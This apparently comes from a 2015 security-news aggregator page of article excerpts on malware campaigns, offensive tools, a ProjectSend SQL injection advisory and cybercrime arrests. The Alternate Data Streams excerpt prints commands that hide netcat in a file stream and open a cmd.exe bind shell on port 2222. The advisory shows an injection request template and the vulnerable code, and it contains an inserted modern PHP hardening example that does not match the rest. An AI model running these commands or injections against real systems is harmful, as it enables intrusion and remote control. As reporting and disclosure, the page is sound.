Channel: BOT24
Viewing all 8064 articles

Utilizing NLP To Detect APT in DNS

Imagine that after a nice, relaxing long weekend, you come in to work Monday morning at your job at the bank. While waking up with a cup of coffee, you begin checking email. Among the usual messages, there’s a message about a security update and you click it. Security updates are so common these days that it’s normal to get another email about one. What you don’t know is that your system has just been infected, starting off a long chain of events behind one of the biggest thefts in cyber history. - See more at: https://labs.opendns.com/2015/03/05/nlp-apt-dns/



Autopsy 3.1.2 Digital Forensic Platform Released

Autopsy® is a digital forensics platform and graphical interface to The Sleuth Kit® and other digital forensics tools. It can be used by law enforcement, military, and corporate examiners to investigate what happened on a computer. You can even use it to recover photos from your camera's memory card.

more here...........http://sleuthkit.org/autopsy/

Scripting Beacons and Deploying Persistence

One common Cobalt Strike feature request is an API to script the Beacon payload. Doing this right is a big project and it requires some architectural changes within Cobalt Strike. I’m working on it. I have a major development effort underway to reshape Beacon’s role in Cobalt Strike. Scripting is one piece of this.

Right now, some automation is possible. Last year, I put together an “emergency API” to deploy persistence through Beacon. My normal methods were causing Meterpreter to crash and I needed another option. This API isn’t supported and it isn’t permanent. It’s a stop-gap. In the mean time, it may help you.


more here......http://blog.cobaltstrike.com/2015/03/05/scripting-beacons-and-deploying-persistence/

Why A Free Obfuscator Is Not Always Free

We all love our code but some of us love it so much that we don’t want anyone else to read or understand it. When you think about it, that’s understandable – hours and hours of hard dev work, days of testing and weeks (months?, years?) of fixing bugs and after all of this, someone steals, changes or modifies your hard work.

To address these concerns, many developers will obfuscate their code.

more here.........http://blog.sucuri.net/2015/03/why-a-free-obfuscator-is-not-always-free.html

XML: A New Vector For An Old Trick

October 2014 saw the beginning of an e-mail campaign spamming malicious Microsoft Office documents. Mostly Word documents using the “old” binary format, but sometimes Excel documents and sometimes the “new” ZIP/XML format. All with VBA macros that auto-execute when opened.

Yesterday, we started to see XML attachments.

more here.............https://isc.sans.edu/diary/XML%3A+A+New+Vector+For+An+Old+Trick/

USING ALTERNATE DATA STREAMS TO PERSIST ON A COMPROMISED MACHINE

Back in the days before Windows Vista, Alternate Data Streams used to be an acceptable way for malware authors to hide their malicious code. An Alternate Data Stream can be used to hide the presence of secret or malicious files inside a legitimate file. By putting malware in an ADS, the entry Windows keeps for the legitimate file also holds the malicious file.

For example:

C:\>type C:\nc.exe > C:\windows\system32\calc.exe:svchost.exe
C:\>start /B C:\windows\system32\calc.exe:svchost.exe -d -L -p 2222 -e cmd.exe

The above commands will hide nc.exe in an Alternate Data Stream for calc.exe called svchost.exe and then start nc.exe from the ADS associated with calc.exe. Microsoft recognized this as an issue and removed the ability to run anything directly from an ADS after Windows XP. In order to run code that resides in an ADS, you would want to create a symlink using the mklink command. While this works, you have to have administrative rights on the machine in order to create the symlink. We all know users are not supposed to be running as an admin, so I tend to approach attack methods with the assumption that I will land on a box without admin rights.

Fortunately, I found a way to inject code into an Alternate Data Stream and execute it as a normal user.

more here.........https://enigma0x3.wordpress.com/2015/03/05/using-alternate-data-streams-to-persist-on-a-compromised-machine/

ProjectSend r561 - SQL injection vulnerability

#Vulnerability title: ProjectSend r561 - SQL injection vulnerability
#Product: ProjectSend r561
#Vendor: http://www.projectsend.org/
#Affected version: ProjectSend r561
#Download link: http://www.projectsend.org/download/67/
#Fixed version: N/A
#Author: Le Ngoc Phi (phi.n.le@itas.vn) & ITAS Team (www.itas.vn)


::PROOF OF CONCEPT::

+ REQUEST:
GET /projectsend/users-edit.php?id=<SQL INJECTION HERE> HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: 54f8105d859e0_SESSION=q6tjpjjbt53nk1o5tnbv2123456; PHPSESSID=jec50hu4plibu5p2p6hnvpcut6
Connection: keep-alive


- Vulnerable file: client-edit.php
- Vulnerable parameter: id
- Vulnerable code:
if (isset($_GET['id'])) {
        $client_id = mysql_real_escape_string($_GET['id']);
        /**
         * Check if the id corresponds to a real client.
         * Return 1 if true, 2 if false.
         **/
        $page_status = (client_exists_id($client_id)) ? 1 : 2;
}
else {
        /**
         * Return 0 if the id is not set.
         */
        $page_status = 0;
}

/**
 * Get the clients information from the database to use on the form.
 */
if ($page_status === 1) {
        $editing = $database->query("SELECT * FROM tbl_users WHERE id=$client_id");
        while($data = mysql_fetch_array($editing)) {
                $add_client_data_name = $data['name'];
                $add_client_data_user = $data['user'];
                $add_client_data_email = $data['email'];
                $add_client_data_addr = $data['address'];
                $add_client_data_phone = $data['phone'];
                $add_client_data_intcont = $data['contact'];
                if ($data['notify'] == 1) { $add_client_data_notity = 1; } else { $add_client_data_notity = 0; }
                if ($data['active'] == 1) { $add_client_data_active = 1; } else { $add_client_data_active = 0; }
        }
}
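The root cause in the snippet above is that mysql_real_escape_string() only escapes quote and backslash characters, and $client_id is interpolated unquoted into a numeric comparison, so input with nothing to escape still alters the query. The following is an added example, not ProjectSend's own code, showing how the same lookup can be written so that no user input ever reaches the SQL text: the id is validated as a plain integer and then bound as a typed parameter. It assumes a PDO connection (PDO is used here instead of the legacy mysql_ extension) and builds its own in-memory SQLite table with constructed rows so it runs stand-alone.

```php
<?php
// Added example (not ProjectSend's code): a hardened replacement for the
// client lookup in client-edit.php. Assumes PDO; uses an in-memory SQLite
// database with constructed sample data so the script runs offline.

declare(strict_types=1);

/**
 * Look up a client by id. Returns the row as an associative array, or null
 * when the id is missing, malformed, or does not correspond to a real client.
 */
function load_client(PDO $db, ?string $raw_id): ?array
{
    // Type validation first: only a non-empty string of decimal digits is
    // accepted. Escaping cannot help an unquoted numeric placeholder, so the
    // check happens before any SQL is built.
    if ($raw_id === null || !ctype_digit($raw_id)) {
        return null;
    }

    // Bound parameter: the value is sent separately from the query text and
    // typed as an integer, so it can never be parsed as SQL.
    $stmt = $db->prepare(
        'SELECT name, user, email, address, phone, contact, notify, active
           FROM tbl_users
          WHERE id = :id'
    );
    $stmt->bindValue(':id', (int) $raw_id, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// ---- stand-alone demonstration with constructed data -----------------------
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec(
    'CREATE TABLE tbl_users (
        id INTEGER PRIMARY KEY, name TEXT, user TEXT, email TEXT,
        address TEXT, phone TEXT, contact TEXT, notify INTEGER, active INTEGER
     )'
);
$db->exec("INSERT INTO tbl_users VALUES (1, 'Alice', 'alice', 'alice@example.test', '', '', '', 1, 1)");
$db->exec("INSERT INTO tbl_users VALUES (2, 'Bob',   'bob',   'bob@example.test',   '', '', '', 0, 1)");

// A well-formed id returns exactly one client's row.
var_dump(load_client($db, '2'));
// An id with trailing SQL is rejected by the digit check before any query runs.
var_dump(load_client($db, '1 OR 1=1'));
// A missing id (the "page_status = 0" case in the original) yields null.
var_dump(load_client($db, null));
// An id that matches no client also yields null.
var_dump(load_client($db, '999'));
```

The digit check alone would be enough to stop injection through this particular parameter, but binding the value as well means the query stays safe if the column type or the validation ever changes; the two measures are independent, and a code review should expect both.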



::DISCLOSURE::
+ 01/06/2015: Detect vulnerability
+ 01/07/2015: Contact to vendor
+ 01/08/2015: Send the detail vulnerability to vendor - vendor did not reply
+ 03/05/2015: Public information

::REFERENCE::
- http://www.itas.vn/news/itas-team-found-out-a-SQL-Injection-vulnerability-in-projectsend-r561-76.html



::DISCLAIMER::
THE INFORMATION PRESENTED HEREIN ARE PROVIDED "AS IS" WITHOUT WARRANTY OF
ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY
IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE
OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS
A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION
OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE AS IS,
AND AT THE USER'S OWN RISK.



Best Regards,
---------------------------------------------------------------------
ITAS Team (www.itas.vn)

Crackme: In Memory Bruteforce

The hardest crackme from the NVISO Cyber Security Challenge 2015 qualifications was a really interesting challenge and forced me to come up with a creative solution.

more here........http://haxelion.eu/writeup/Crackme_In_Memory_Bruteforce/

Multiplatform Boleto Fraud Hits Users in Brazil

A study conducted around June last year revealed a malware-based fraud ring that infiltrated one of Brazil’s most popular payment methods – the Boleto Bancário, or simply the boleto. While the research and analysis was already published by RSA, we’ve recently discovered that this highly profitable fraud is still out in the wild and remains an effective means of online banking theft for cybercriminals in Brazil.

The boleto malware campaign had a reported potential loss of US$3.75 billion. The recent detections we found comprise malicious Mozilla Firefox and Google Chrome extensions cleverly installed in victims’ machines. Spammed messages with fake threats of debt that must be paid to governments are used to get users to install these extensions.

more here.........http://blog.trendmicro.com/trendlabs-security-intelligence/multiplatform-boleto-fraud-hits-users-in-brazil/

TLS-O-MATIC

Automated self-tests of TLS. Tests 1-15 are tests of certificate validation.
Test 20 is based on recommendations from bettercrypto.org on how to configure Apache HTTPD for a strong server. Test 21 is a test of weak crypto. An application that wants to claim to be secure today should not connect to a server configured like this.

more here...........https://github.com/edvinanet/tls-o-matic

Mining public keys with IVRE

In my previous post I explained how I ran a scan against Internet-exposed Modbus-enabled devices and shared the results obtained.

I have been asked several times why I had chosen to run a Zmap + Nmap scan instead of a Zmap + Zgrab scan, which would have been a lot faster.

Here is my answer: I wanted to scan the other services running on the Modbus-enabled devices, because:

They tell a lot about the device behind the IP address (screenshots are a feature I really like, but anonymous FTP file listing is also great, for example)
They often show interesting weaknesses.

more here.........http://pierre.droids-corp.org/blog/html/2015/03/06/mining_public_keys_with_ivre.html

Listen: Sound Of Botnets Helps Microsoft Fight Cybercrime

Last week Europol’s European Cybercrime Center led the takedown of a network of computers controlled by cybercriminals. Microsoft played an important role, taking legal action that led to the seizure of servers in four countries — servers that were the command and control centers for millions of infected computers worldwide.

These armies of infected computers are known as botnets. They’re computers infected with malware that turns the devices against their owners to steal banking credentials and crash websites. It’s been a silent problem. Until now.

more here........http://kuow.org/post/listen-sound-botnets-helps-microsoft-fight-cybercrime

Dozens arrested in cybercrime 'strike week'

The UK's National Crime Agency has arrested 56 suspected hackers as part of a "strike week" against cybercrime.

In total, 25 separate operations were carried out across England, Scotland and Wales.

Those arrested are suspected of being involved in a wide variety of cybercrimes including data theft, fraud and virus writing.

One raid the BBC witnessed targeted a man suspected of involvement in a 2012 hack attack on web giant Yahoo.

more here..........http://www.bbc.com/news/technology-31753934

and video of one suspect.......https://www.youtube.com/watch?v=XH-uEriFIHA

autopwn- Specify targets and run sets of tools against them

autopwn is supposed to make a pentester's life easier by allowing them to specify tools they would like to run against targets, without having to type them all the time or write some dodgy script. This tool will also be useful during certain exams, I suspect.

Core concepts of this project are:

Quickness - Specify targets and run pre-defined assessments against them
Easiness - Tool should be easy to use and write tool and assessment configurations for
Recon - This tool should be considered for recon purposes only. I wouldn't rely on this script to automatically identify and exploit issues (even though the tool name sort of implies such skiddy concepts)

more here.............https://github.com/nccgroup/autopwn

Paper: Leaving our ZIP undone: how to abuse ZIP to deliver malware apps

Both Android and Java malware, delivered via ZIP-based packages, have reached high volumes in the wild, and continue to grow at a rapid rate. In his VB2014 paper, Gregory Panakkal explores the ZIP file format, focusing specifically on APK files as handled by the Android OS. He also explores new malformations that can be applied to APK files to break typical AV engine unarchiving, thus bypassing content scanning, while keeping the APK valid for the Android OS.

more here........https://www.virusbtn.com/virusbulletin/archive/2015/03/vb201503-ZIP

Angler and the new threats

What I am writing is not "news" anymore, but it is more of a "consciousness raising" about the incredible job the guys behind the Angler Exploit Kit did.

But, let me start from the beginning. For everybody out there who does not know what an Exploit Kit is, I found a clear and nice description from McAfee Labs:
An exploit kit is an off-the-shelf software package containing easy-to-use packaged attacks on known and unknown (zero-day) vulnerabilities. These toolkits exploit client-side vulnerabilities, typically targeting the web browser and applications that can be accessed by the web browser. Exploit kits can also track infection metrics and have robust control capabilities.
Angler is one of several Exploit Kits available for attackers. Actually, the Angler Exploit Kit has become the most advanced, most powerful and best exploit kit available in the market so far, beating the infamous BlackHole exploit kit, with a host of exploits including zero-days and new techniques added to it.

What makes Angler so great are the following two characteristics: Domain Shadowing ("DSH") and Fileless Infection ("Fileless").

more here.........http://marcoramilli.blogspot.com/2015/03/angler-and-new-threats.html

powercat

powercat
Netcat: The powershell version. (Powershell Version 2 and Later Supported)

Installation

powercat is a powershell function. First you need to load the function before you can execute it. You can put one of the below commands into your powershell profile so powercat is automatically loaded when powershell starts.

more here........https://github.com/besimorhino/powercat

Skype worm reloaded

Skype worms are not exactly new anymore (unfortunately).

The scenario is simple: someone on your friends list got infected and is now sending you a link to a ‘funny image’ or pictures of you. In this case, you are being baited by a video of you. Let’s just hope it’s nothing embarrassing ;)

more here..........http://www.pandasecurity.com/mediacenter/malware/skype-worm-reloaded/

uTorrent silently installing bundled Bitcoin mining software

BitTorrent client uTorrent has come under fire from users after it emerged the software’s latest update comes bundled with Bitcoin mining software.

The piece of software, named Epic Scale, is a Bitcoin miner that purports to use your ‘unused processing power to change the world.’

According to one user, the software is ‘easily noticeable by the increased CPU load when the computer is idle.’

Unfortunately, the problem lies in the fact that users say they weren’t asked whether they wanted the software to be installed.
Read more at http://www.trustedreviews.com/news/utorrent-silently-installing-bundled-bitcoin-mining-software#7gMzDzfWV9GwZxti.99

TLS in HTTP/2

I’ve written the http2 explained document and I’ve done several talks about HTTP/2. I’ve gotten a lot of questions about TLS in association with HTTP/2 due to this, and I want to address some of them here.......http://daniel.haxx.se/blog/